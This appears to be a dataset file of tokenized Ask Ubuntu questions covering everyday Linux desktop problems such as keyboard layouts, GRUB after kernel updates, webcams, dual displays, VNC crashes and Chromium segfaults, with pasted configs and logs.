3355	keyboard layout on ubuntu wo n't go away !	so , i installed ubuntu ( using gnome ) with keyboard layout us international with dead keys enabled . now i 've set this to us international with alt-gr dead keys enabled . i added the latter and deleted the first . i then clicked `` apply to entire system '' and closed the keyboard manager . now whenever i reboot , the old keyboard lay-out is re-added to the list and set to the default keyboard layout . the keyboard with us international with alt-gr dead keys enabled is still in that list so it does n't completely revert to the installation settings , making me conclude that it must have saved the settings ... how can i make this keyboard ghost go to the eternal /dev/null/ plane so that it will never rise from the grave again ? ( how to get rid of the thing ... )
3359	with a launcher for a terminal application , how can i keep the terminal open after the program is complete ?	i have a terminal command i run from an application launcher . this works great , however sometimes the command fails , so i 'd like for the terminal to stay open so i can see the results . how can i do this ?
3362	how enable/disable wifi adapters individually under 10.04	i have a laptop with an internal wifi g adapter , and i have an external usb wifi adapter that is compatible with n. the internal wifi can be disabled using a little switch on the side of the laptop . however , when i disable it using the switch , it disables all wifi adapters , internal or external . i want to use the external usb adapter , since it 's faster . also , on my eeepc , i can not seem to be able to disable the internal wifi adapter . the blue light remains on , which means i can not use my eeepc in an airplane . how can i fix those problems ? thanks : - )
3363	how to open a nautilus directory and select a file in it from the command line ?	i know how to open directory , but i do not know how to select a file from the command line . edit : i do not know how it works , but when i move any file to a directory and then open the directory that this file is selected .
3369	what is the difference between hibernate and suspend	logout , restart and shutdown are all self explanatory to me . what are the differences between suspend and hibernate on the shutdown menu ?
3372	setup blue eyeball webcam for ubuntu lucid lynx for skype	my blue eyeball webcam works for the application cheese out-of-the-box in ubuntu . now i would like to use it for skype for which it does not work . what can i do ? update3 : i had limited time to return the webcam , so i returned it and bought one that was on the list of webcams supported in skype . update2 : on this site : https : //wiki.ubuntu.com/skypewebcams they give the following tips when webcams work in cheese but not skype . i do n't understand some , do they look like they would help ? ~http : //code.google.com/p/gstfakevideo/ works right away in cheese . to get skype video , run `` ld_preload=/usr/lib32/libv4l/v4l1compat.so skype '' at the command line ( note the lib32 ! ! ! ) skype 2.0.0.72 : you should setup ov51x-jpeg ( version here : 1.5.8 ) and `` sudo modprobe ov51x-jpeg forceblock=1 '' or edit /etc/modprobe.d/options and add there `` options ov51x-jpeg forceblock=1 '' . loading ov51x-jpeg without forceblock-option results in a black video stream for skype , while it works fine using `` cheese '' . works with cheese ootb but not in skype . works in skype ( 2.1.0.47 ) when setting `` ld_preload=/usr/lib/libv4l/v4l1compat.so skype '' update : i have included output of diagnostic programs . v4l-info # # # v4l2 device info [ /dev/video0 ] # # # general info vidioc_querycap driver : `` uvcvideo '' card : `` blue eyeball 2.0 '' bus_info : `` usb-0000:00:1d.7-3 '' version : 0.1.0 capabilities : 0x4000001 [ video_capture , streaming ] standards inputs vidioc_enuminput ( 0 ) index : 0 name : `` camera 1 '' type : camera audioset : 0 tuner : 0 std : 0x0 [ ] status : 0x0 [ ] video capture vidioc_enum_fmt ( 0 , video_capture ) index : 0 type : video_capture flags : 0 description : `` yuv 4:2:2 ( yuyv ) '' pixelformat : 0x56595559 [ yuyv ] vidioc_enum_fmt ( 1 , video_capture ) index : 1 type : video_capture flags : 1 description : `` mjpeg '' pixelformat : 0x47504a4d [ mjpg ] vidioc_g_fmt ( video_capture ) type : video_capture fmt.pix.width : 640 fmt.pix.height : 480 fmt.pix.pixelformat : 0x56595559 [ yuyv ] fmt.pix.field : none fmt.pix.bytesperline : 1280 fmt.pix.sizeimage : 614400 fmt.pix.colorspace : unknown fmt.pix.priv : 0 controls vidioc_queryctrl ( base+0 ) id : 9963776 type : integer name : `` brightness '' minimum : -10 maximum : 10 step : 1 default_value : 4 flags : 0 vidioc_queryctrl ( base+1 ) id : 9963777 type : integer name : `` contrast '' minimum : 0 maximum : 20 step : 1 default_value : 12 flags : 0 vidioc_queryctrl ( base+2 ) id : 9963778 type : integer name : `` saturation '' minimum : 0 maximum : 10 step : 1 default_value : 7 flags : 0 vidioc_queryctrl ( base+3 ) id : 9963779 type : integer name : `` hue '' minimum : -5 maximum : 5 step : 1 default_value : 2 flags : 0 # # # video4linux device info [ /dev/video0 ] # # # general info vidiocgcap name : `` blue eyeball 2.0 '' type : 0x1 [ capture ] channels : 1 audios : 0 maxwidth : 1600 maxheight : 1200 minwidth : 48 minheight : 32 channels vidiocgchan ( 0 ) channel : 0 name : `` camera 1 '' tuners : 0 flags : 0x0 [ ] type : camera norm : 0 tuner audio picture vidiocgpict brightness : 45875 hue : 45875 colour : 45875 contrast : 39321 whiteness : 38010 depth : 16 palette : yuyv buffer window vidiocgwin x : 0 y : 0 width : 640 height : 480 chromakey : 0 flags : 0 camorama -d vidiocgcap device name = blue eyeball 2.0 device type = 1 can use mmap ( ) # of channels = 1 # of audio devices = 0 max width = 1600 max height = 1200 min width = 48 min height = 32 vidiocgwin x = 0 y = 0 width = 800 height = 600 chromakey = 0 flags = 0 vidiocgwin x = 0 y = 0 width = 800 height = 600 chromakey = 0 flags = 0 vidiocgpict : bright = 45875 hue = 45875 colour = 45875 contrast = 39321 whiteness = 38010 colour depth = 16 yuyv
3375	how to change time-zone settings from the command line	i have a virtual machine that is set to pst that a couple of colleagues have in different timezones . if i wanted to change the time-zone to est and gmt , what do i need to do ?
3377	modules are n't loading - or something even more serious is wrong	i am trying to solve this problem . in the process , i messed up the kernel configuration and some of the modules are n't loading . whenever i start that particular kernel , i get a message saying `` module nvidia could not be found . '' this of course means the usb module is n't working either . no mouse . thankfully i had another kernel installed that i 'm using now - but i 'd like my other one back . i can remember some of the steps i took - i edited some of the arguments being passed to the kernel - but i just got rid of those by editing the line when grub started - and it still did n't fix anything . the only other thing i remember is messing with initramfs . how would i go about fixing that ? i can boot to a console , but i 'm not very familiar with any command-line text editors . is there a way to fix this from the kernel i 'm using right now ?
3378	my processor is 64-bit - does that mean i need the amd64 image ?	my processor is an intel core 2 duo p8600 ( 2.40ghz ) . as far as i know that 's a 64-bit processor - i 'm a bit confused as the architecture is called amd 64 , is this a generic name given to 64-bit architectures ? i 've heard of x64 but ca n't see a release labelled with this .
3379	is there a way to disable kernel updates ?	i run a more recent kernel ( 2.6.34 ) than the ones supplied with the update manager . i am tired of updates asking me to reboot every week or so and screwing my grub.cfg ( this probably deserves it 's own question ) . how can i disable those updates painlessly ? thanks .
3382	reduce filesize of a scanned pdf	i 've got a pdf of a scanned document that 's around 20mb and i need to drastically reduce the filesize to be able to email it . i 've tried gs -sdevice=pdfwrite -dcompatibilitylevel=1.4 -dpdfsettings=/screen -dquiet -dbatch -soutputfile=output.pdf input.pdf but output.pdf is n't created . instead , i get an x viewer for ghostscript briefly . where am i going wrong ?
3389	shortcut key for terminator lands in the `` / '' directory	i bound the command `` terminator '' to super + t in the shortcut keys configuration . this is nice and all except terminator starts with / as the current directory , not ~ . how to change this ?
3394	how to get second display to work alongside primary display ?	i 've almost got this problem solved ... i 've got both displays working now . the secondary display is displaying a purple background . unfortunately , i ca n't use it . ( i ca n't move the mouse into it , etc . ) here is the output of xrandr -- verbose -- screen 1 : screen 1 : minimum 320 x 200 , current 800 x 480 , maximum 800 x 480 lilliput usb mo connected ( normal ) identifier : 0x175 timestamp : 271103 subpixel : horizontal rgb clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : edid : 00ffffffffffff0031900120eb030000 2013010380101778ca54548f54599726 cb545400000001010101010101010101 010101010101540b208030e02d102830 7304000000000018000000fd00374118 2905000a202020202020000000fc0055 5342204d6f6e69746f720a0a00000010 00000000000000000000000000000028 800x480 ( 0x176 ) 29.0mhz -hsync -vsync +preferred h : width 800 start 840 end 888 total 928 skew 0 clock 31.2khz v : height 480 start 503 end 506 total 525 clock 59.5hz and here is my xorg.conf file : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 1.0 ( buildd @ yellow ) fri apr 9 11:51:21 utc 2010 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 1.0 ( buildmeister @ builder58 ) fri mar 12 02:12:40 pst 2010 section `` serverlayout '' identifier `` layout0 '' screen 1 `` displaylinkscreen '' rightof `` screen0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` lpl '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400m gs '' busid `` pci:1:0:0 '' screen 0 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # displaylink stuff # # # # # # # # # # # # # # # section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb0 '' endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' defaultdepth 16 subsection `` display '' depth 16 modes `` 800ă480 '' endsubsection endsection update : after adding ... xinerama `` 1 '' ... i now have the secondary screen mirroring the primary one . but i 'm hoping i can have separate displays .
3395	how to get the mime type of a file from the command line ?	i 'm trying to get the mime type of a file from the command line as a printed string ( eg . application/vnd.oasis.opendocument.spreadsheet ) . i looked up how to do this and found the xdg-mime command . from reading the man page ( man xdg-mime ) , it seems i should run xdg-mime query filetype file . however , when i run this with any file it prints nothing and exits . is there a way to fix this ? an alternative command ?
3396	chromium , tweetdeck , and geany do n't work when set to run at login	i have `` automatically remember running applications when logging out '' enabled in `` startup application preferences '' . however , some programs do n't work with this setting : namely chromium tweetdeck and geany ; none of these programs are restored whenever i restart the machine . other programs such as firefox , gedit , terminal are able to be restored automatically on restart . is there any way i can have all of these programs restored appropriately on startup ? or at least chromium ?
3402	how to move boot and root partitions to another drive	i have two drives on my computer that have the following configuration : drive 1 : 160gb , /home drive 2 : 40gb , /boot and / unfortunately , drive 2 seems to be dying , because trying to write to it is giving me errors , and checking out the smart settings shows a sad state of affairs . i have plenty of space on drive 1 , so what i 'd like to do is move the / and /boot partitions to it , remove drive 2 from the system , replace drive 2 with a new drive , then reverse the process . i imagine i need to do some updating to grub , and i need to move some things around , but i 'm pretty baffled how to exactly go about this . since this is my main computer , i want to be careful not to mess things up so i ca n't boot .
3403	get a file 's emblem from command line ?	i 'd like to be able to determine what emblem a file has from the command line . is there a way to determine this ? also , is there a way to apply emblems from the command line ? i usually have a cron job that trashes files over 7 days old in my ~/downloads , but i 'd like to be able to only delete files that do n't have a particular emblem ( my seeding torrents ) . i 've been applying these emblems manually , but if i can automate that as well , that 'd be awesome . my usual cron job is just a simple find command : find /home/zach/downloads/ -ctime +7 -exec trash { } \ ; edit : i solved my own question . bonus : to elaborate on exactly what i 'm doing , i use deluge-torrent to manage my downloads . i am now using the execute plugin to run this script on torrent complete : # ! /usr/bin/env bash # deluge gives the download directory name as the third argument gvfs-set-attribute -t stringv `` $ 3 '' metadata : :emblems ubuntuone-unsynchronized i then created my trasher.sh ( this requires the trash-cli package ) : # ! /usr/bin/env bash [ [ `` $ ( gvfs-info -a metadata : :emblems $ * ) '' =~ `` ubuntuone-unsynchronized '' ] ] || trash `` $ * '' now , i just modify my cron to : find /home/zach/downloads/ -maxdepth 1 -ctime +7 -exec /home/zach/scripts/trasher.sh { } \ ; and voila ! now deluge can manage its downloads , while my cleanup script can safely cleanup old files without interfering with seeding torrents .
3404	why does gnome-session crash my tightvnc session and how can i fix it ?	i 'm running ubuntu 9.10 x64 , with the stock tightvncserver ( 1.3.9 ) . when i start tightvncserver , i can connect with the windows tightvnc client and get the empty desktop with a single terminal . when i then try to start gnome-session it promptly crashes . the last lines on the tightvncserver log are : 01/09/10 10:53:18 got connection from client 192.168.1.31 01/09/10 10:53:18 using protocol version 3.8 01/09/10 10:53:18 enabling tightvnc protocol extensions 01/09/10 10:53:20 full-control authentication passed by 192.168.1.31 01/09/10 10:53:20 pixel format for client 192.168.1.31 : 01/09/10 10:53:20 32 bpp , depth 24 , little endian 01/09/10 10:53:20 true colour : max r 255 g 255 b 255 , shift r 16 g 8 b 0 01/09/10 10:53:20 no translation needed 01/09/10 10:53:20 using tight encoding for client 192.168.1.31 01/09/10 10:53:20 rfbprocessclientnormalmessage : ignoring unknown encoding 8 01/09/10 10:53:20 enabling x-style cursor updates for client 192.168.1.31 01/09/10 10:53:20 enabling cursor position updates for client 192.168.1.31 01/09/10 10:53:20 using image quality level 6 for client 192.168.1.31 01/09/10 10:53:20 enabling lastrect protocol extension for client 192.168.1.31 01/09/10 10:53:20 rfbprocessclientnormalmessage : ignoring unknown encoding -223 xterm : fatal io error 11 ( resource temporarily unavailable ) or killclient on x server `` :3.0 '' the output from gnome-session ( obtained from gnome-session | tee output ) is : gnome_keyring_socket=/tmp/keyring-muvfsj/socket ssh_auth_sock=/tmp/keyring-muvfsj/socket.ssh gnome_keyring_pid=2783 ** ( < unknown > :2779 ) : debug : client registered with session manager : /org/gnome/sessionmanager/client2 checking for xgl : not present . xset q does n't reveal the location of the log file . using fallback /var/log/xorg.0.log detected pci id for vga : checking for texture_from_pixmap : not present . trying again with indirect rendering : checking for texture_from_pixmap : not present . aborting and using fallback : /usr/bin/metacity i 've checked the /var/log/xorg.0.log but this contains nothing pertinent to the vnc session . i am currently successfully using tightvncserver on other 9.10 systems . the system which exhibits the problem does not differ from my other working systems in any way that seems significant to me . what i 'd like to know is : what i should be doing to find out further information on what is failing what is causing the crash how can i fix it ?
3407	auto bcc is not working when contain attachment in postfix	i 'm using postfix smtp and adding always_bcc . always_bcc = admin @ somesite.com it 's working fine without attachment . when i add attachment , auto bcc is not working and admin did n't get email . how to fix that problem ?
3408	how does ubuntu handle deadlock situations ?	i need links to some documentation which states how ubuntu handles deadlock , which method does it apply ? please note am asking this question as am a new user regarding the os and therefore really confused google is not helpful edit -- additional details ( kernal and user space in general how to compare linux with an ms windows )
3411	is there a way to use *some* packages from upcoming version of ubuntu ?	for my work i need to stay close to 2.8 version of llvm ( not yet released ) . i found out that maverick will have it installed and already have some prepackaged version . is there a way i can use just this packages ( and all the packages it depends on ) in my current ubuntu installation ? some kind of repository maybe ?
3418	how can i completely remove wireless drivers ?	on my laptop the wireless seems to be detected but it fails to connect . even turning the switch on and off seems to have no effect . this is the output of lspci command : 06:02.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) i have the package b43-fwcutter istalled . some people told me if i remove the linux driver and install ndiswrapper the proplem would be solved . is that true ? and if the answer is yes how can i do that ?
3421	external hard drive permissions problem with apache since 10.04 upgrade	i have a fat32 external hard drive plugged into my server at home and since upgrading to ubuntu 10.04 ( from 8.10 - it was a bug jump ! ) i 've been having permissions trouble with it . it used to be mounted as root automatically and i think the permissions were pretty much 'ignored ' . since the upgrade , it is being mounted with the group and owner being my user . obviously , i need access as my user and this is no problem still . however , i am also running a php script ( via apache ) that serves certain files to authenticated users . this is now no longer working . if i run php as my user there is no problem ( obviously ) . however , when running under www-data it can not access the drive so my script is now failing . the permissions on the drive look like this at the moment : drwx -- -- -- 1 adamnfish adamnfish -rwxrwxrwx 1 adamnfish adamnfish for folders and files respectively . it 's very clear what the problem is ( only adamnfish can access the drive ! ) but i have no idea how to fix the problem . i 've tried mounting the drive every which way and even using gui tools to try and set the bitmask properly ! the hard drive is always plugged in , but sometimes i kick its power cord while tidying up ( so the solution needs to be resilient to plugging / unplugging the drive ) and i reboot the machine from time to time ( so ideally it 'll be an fstab entry or something so i do n't need to manually unmount and remount with the correct permissions every time ) . thanks in advance , i know this will be obvious to a lot of people but i 've been pulling my hair out !
3424	chromium does n't work	my chromium browser does n't work for some reason . what i mean by that is that it does n't even start up when i click on chromium icon or choose chromium from applications menu . what might be the problem ? after typing : chromium-browser in the terminal i get this : /home/freshnrg/.themes/t-ish-brushed-overlaid/gtk-2.0/gtkrc:56 : clearlooks configuration option `` sunkenmenu '' is not supported and will be ignored . /home/freshnrg/.themes/t-ish-brushed-overlaid/gtk-2.0/gtkrc:57 : clearlooks configuration option `` menuitemstyle '' is not supported and will be ignored . /home/freshnrg/.themes/t-ish-brushed-overlaid/gtk-2.0/gtkrc:58 : clearlooks configuration option `` listviewitemstyle '' is not supported and will be ignored . /home/freshnrg/.themes/t-ish-brushed-overlaid/gtk-2.0/gtkrc:59 : clearlooks configuration option `` progressbarstyle '' is not supported and will be ignored . segmentation fault so nothing about any errors connected to chromium because all that is just my ubuntu theme errors witch i get all the time . do n't understand that segmentation fault not sure if that has anything to do with chromium . after typing : rm -rf ~/.config/chromium and then : chromium-browser chromium actually starts from scratch asking if i want to import bookmarks from firefox and it does n't matter what i choose because that is it . after that nothing happens and chromium still does n't work . re-installation did n't helped . i still get segmentation fault error . edit : i 've done all this , went back to official version 5.0.375.127 , i 've re-installed it couple of times and still nothing . i still have that segmentation fault error . edit : it 's definitely something to do with dropbox . after installing dropbox on my new account chromium stopped working . how can i get rid of dropbox on my old account as i 've uninstalled it and deleted all the files that has anything to do with dropbox but i still ca n't get chromium to work ?
3426	google voice and video : video is not supported on this os	im running the latest release version ( 5.0.372.127 ) of chrome on karmic koala x86 . i just installed google voice and video chrome plugin with out problems but if i try to start a video call then i get this message ( in the chat window ) . video is not supported on this os . learn more ... the learn more ... is static text i.e . no link so thats not much use . a quick google shows that ubuntu does support this feature , theres even a thread here . any ideas ? sorry if iv'e omitted any crucial information , let me know and ill update the question asap .
3431	boot with `` noacpi '' automatically from hard drive ?	if i boot ubuntu from the live cd without any special options i get the following message : [ 0.040001 ] kernel panic - not syncing : io-apic + timer does n't work ! boot with apic=debug and send a report . then try booting with the 'noapic ' option . [ 0.040001 ] so i booted with the noapic option ( and the acpi=off option because the noapic option alone did n't work ) . it booted fine and i was able to install . then after the restart i got the above message again . is there a way to tell ubuntu to use the noapic option when booting from harddrive ?
3432	how can i view a microsoft publisher .pub file ?	i need to view a .pub file . how can i view the file or convert it to a more mainstream format ( such as a pdf ? )
3434	no sound in flash on ubuntu 9.04	on my ubuntu 9.04 on standard dell pc , i have no sound in flash applets . i had the same problem on 8.10 sound works fine elsewhere ( reading a mp3 with a player for example ) . i tried konqueror , firefox , chromium : no sound . the test consist into reading a youtube video . it seems to be connected with flash . ps : i 'm a newbie on linux .
3446	how to create and administer multi-architecture ppas ?	i have a program that needs to be recompiled for every ubuntu version . currently i am packaging it using ubuntu 's ppa just for the current distribution . eventually , i have to provide packages for the previous ubuntu version . i am not sure how to accomplish this . how does the ubuntu ppa build server works - does it just look at the distribution field in the most current changelog entry ( in the debian/changelog file ) to determine for what distribution the package should be build ? the debian specification allows to add multiple distributions into the distribution field . but this does not seam to help me . some ubuntu documents talk about encoding the distribution name into the version number ( in the debian changelog file ) . but how does this work in practice ? a new version of the program is available , then what ? do i add for each distribution a new changelog entry and the ppa buildserver builds automatically for each distribution new packages after dput'ing it up ? or does the ppa buildserver just looks at the first changelog entry ?
3447	easily add mount points to ubuntu	is there a nice , possibly gui way to add mount points to partitions in ubuntu ? for some reason , the mount point for my windows ntfs partition which was recognized during the installation is gone . in `` computer '' the library still exist , but there 's no mount point in fstab or mtab . how can i add it again , so that it 'll be nicely accessible from gnome as it used to be ?
3450	how i can use xorg with intel video drivers ?	i have notebook hp compaq nx9020 with intel graphick 855mg . when i installing ubuntu 10.04 in text mode all work good . after reboot notebook is frezze after screen ubuntu . windows work fine . hardware ok . if i use vesa drivers i no see anything in graphic mode . console work fine . can you help me ? ps sorry for my poor english .
3457	can i override an sd card 's write-protect switch ?	the write-protect switch on an sd card does n't connect to any internal electronics , so it must just be respected by the software controlling the card reader . is there any way for me to override this setting and mount a write-protected card with read-write permissions ?
3460	gwibber and oauthcalypse	my gwibber app in 10.04 seems to have fallen victim to the oauthcalypse . i understand that the latest version of gwibber has this corrected . what is the easiest way to install a version of gwibber that will work once again with twitter ?
3463	how to debug nautilus extension ?	i recently installed mpd-gnome which among other things adds a nautilus extension nautilus-mpd.py . this extension does not seem to be working so i decided to run nautilus from the command line to see if it threw up some kind of error regarding the extension . unfortunately as soon as i attempted this nautilus forked to the background or something . how can i see exactly why my extension is n't work ?
3468	mouse no longer works	my mouse was working fine up until this morning . since then my mouse has stopped working . however the red led bottom is still on and it works in windows on same machine . the keyboard is unaffected . there is not error messages fired at boot time . what can be the possible reason and how can this be solved . -- edit -- yesterday i went out of space . so i cleared /tmp , /var/tmp . after some googling i saw few guys in some forum clearing /var/cache . so i cleared /var/cache too . and everything went nice even after that . now on morning its actually gdm is refusing to take any input ( not even keyboard inputs ) i thought to reinstall gdm . but apt is complaining about missing /var/cache/apt
3469	sound applet disappeared and wo n't come back	recently ( i do n't do n't know when , might have been after and update ) the sound indicator disappeared from my panel , in addition i have n't been getting any sound either . i tried installing the indicator-sound package , but all i got was this error message : the following packages have unmet dependencies : indicator-sound : depends : libido-0.1-0 ( > = 0.1.1 ) but it is not going to be installed e : broken packages seems to be a bug , but how do i get around it ? could i install and older version of libido ? if so , how do i do that ? everything had worked fine until a couple days ago , so i 'm sure that the package is the problem . edit : the command $ dpkg -- get-selections | grep libido returns the following output : libido-0.1-0 deinstall edit2 : ok , that 's embarassing . yesterday i uninstalled and reinstalled the libido package half a dozen times , and the indicator-sound package kept reporting the same error . today , however , i just installed the libido package and now the indicator-sound package installed with no errors . maybe the system needed a reboot or something . ( should i answer my own question or just wait for a moderator to close it ? )
3470	alternative desktop managers	gnome is a reasonable desktop manager , but it does n't seem to match mac osx or windows 7 . are there any alternatives for ubuntu that focus more on usability ?
3475	system76 using ati cards in their laptops -- good or bad ?	i 've purchased several system76 desktops and have been pleased with them . they can only be configured with nvidia cards . that 's why i was surprised to see that their pangolin performance laptop can only be configured with `` ati mobility radeon hd 4570 graphics with 512mb gddr2 memory . '' i 'm a little concerned given ati 's historically poor linux performance . have things changed that much ? i contacted system76 and they said they regularly offer both ati and nvidia on and off , and that ati cards give more bang for the buck . really ? with linux ?
3476	grub no longer boots after kernel update ( second time now )	some weeks ago i configured a dual boot laptop to run xubuntu 10.4 on the third partition of my disk ( i.e . i had to set the installation location manually ) . everything was fine until i had installed the bunch of automatic updates ( including a new kernel ) , which were discovered after wifi was finally working . after rebooting , grub did n't boot into xubuntu anymore ( which it did several times before ) , but just showed a prompt . i managed to get the system repaired using a live cd and a good hour of internet reading . for some weeks everything was fine , including automatic updates . yesterday i got a new kernel through automatic updates . and guess what ? the laptop refused to boot afterwards . to me it looks like every kernel update makes my system unbootable . how can i prevent this besides the obvious `` do n't install updates '' ? is there anything else i should inspect or monitor on that system ? or are my conclusions about the kernel update completely wrong and i should look for something else causing these symptomes ? edit : some more details as asked in the comments : i did n't start windows between the update and the crash , so for me it seems to be related to xubuntu only . grub is grub2 ( version 1.98something ) . /boot/grub/grub.cfg looks like this : # # do not edit this file # # it is automatically generated by /usr/sbin/grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then load_env fi set default= '' 0 '' if [ $ { prev_saved_entry } ] ; then set saved_entry= $ { prev_saved_entry } save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z $ { boot_once } ] ; then saved_entry= $ { chosen } save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n $ { have_grubenv } ] ; then if [ -z $ { boot_once } ] ; then save_env recordfail ; fi ; fi } insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 insmod gfxterm insmod vbe if terminal_output gfxterm ; then true ; else # for backward compatibility with versions of terminal.mod that don't # understand terminal_output terminal gfxterm fi fi insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 set locale_dir= ( $ root ) /boot/grub/locale set lang=de insmod gettext if [ $ { recordfail } = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , mit linux 2.6.32-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 linux /boot/vmlinuz-2.6.32-24-generic root=uuid=c1550ae8-66af-414c-874d-15cb43176ba5 ro quiet splash initrd /boot/initrd.img-2.6.32-24-generic } menuentry 'ubuntu , mit linux 2.6.32-24-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 echo 'linux 2.6.32-24-generic wird geladen …' linux /boot/vmlinuz-2.6.32-24-generic root=uuid=c1550ae8-66af-414c-874d-15cb43176ba5 ro single echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-2.6.32-24-generic } menuentry 'ubuntu , mit linux 2.6.32-21-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 linux /boot/vmlinuz-2.6.32-21-generic root=uuid=c1550ae8-66af-414c-874d-15cb43176ba5 ro quiet splash initrd /boot/initrd.img-2.6.32-21-generic } menuentry 'ubuntu , mit linux 2.6.32-21-generic ( wiederherstellungsmodus ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 echo 'linux 2.6.32-21-generic wird geladen …' linux /boot/vmlinuz-2.6.32-21-generic root=uuid=c1550ae8-66af-414c-874d-15cb43176ba5 ro single echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-2.6.32-21-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod ext2 set root= ' ( hd0,5 ) ' search -- no-floppy -- fs-uuid -- set c1550ae8-66af-414c-874d-15cb43176ba5 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` microsoft windows xp professional ( on /dev/sda1 ) '' { insmod ntfs set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set 883cb1b73cb1a09c drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # #
3481	does firefox have something similar to activex in terms of security vulnerabilities ?	people always say that linux is more secure than windows . the main reason seems to be the general system design philosophy and the fact that users are users and not root . one main security concern when using windows and internet explorer seem to be activex . every few days i read about another kind of exploit using activex , and almost always the workaround is to deactivate activex . i read that so often i wonder why people bother to activate activex at all . ( one reason might be that the name contains `` active '' ; another might be the windows update function . ) using ubuntu and firefox , i always feel so safe when reading about the activex exploits . i know that there are many other security vulnerabilities that use javascript and/or adobe flash , but as far as i understand those kind of security vulnerabilities can only do as much damage as my user rights allow . of course that does n't help much when the malware wants to destroy all of my data - but most malware today only wants to use my pc as a botnet drone and so is not interested in destroying my data . so the question again : does firefox running under ubuntu have something similar to activex , in terms of security vulnerabilities ? another question which may be identical : can a security vulnerability involving adobe flash and/or javascript be `` easily '' exploited to do as much damage as an activex exploit ? when i say `` easy '' i mean that the attack does not need to exploit another component of the system to elevate user rights . for example , an exploit involving adobe flash will gain access to my pc using my user rights , and then proceed to exploit some known vulnerability in x to gain root access . that is not `` easy '' .
3484	magick jack or equivalent on ubuntu	i hate to have the windows pc just for the sake of running my magick jack on , have long since left windows for ubuntu for all my home pc 's . has anyone figured out , how to get this or an alternative working on ubuntu ?
3489	gnome-do style keyboard shortcuts in unity	will the unity launcher in 10.10 une have gnome-do style keyboard shortcuts ? i.e . super + spacebar for quick search and application launch if not , can it be customized to allow this ?
3497	how do i get evolution to apply filters automatically ?	i am using an imap email account . i created a filter in evolution to move email from a specific high-volume source into a particular folder , to keep the inbox uncluttered . i noticed that incoming emails are coming straight into the inbox . if i select messages- > apply filters , then they are moved into the folder . is there an option to make this filtering apply automatically to all new emails ?
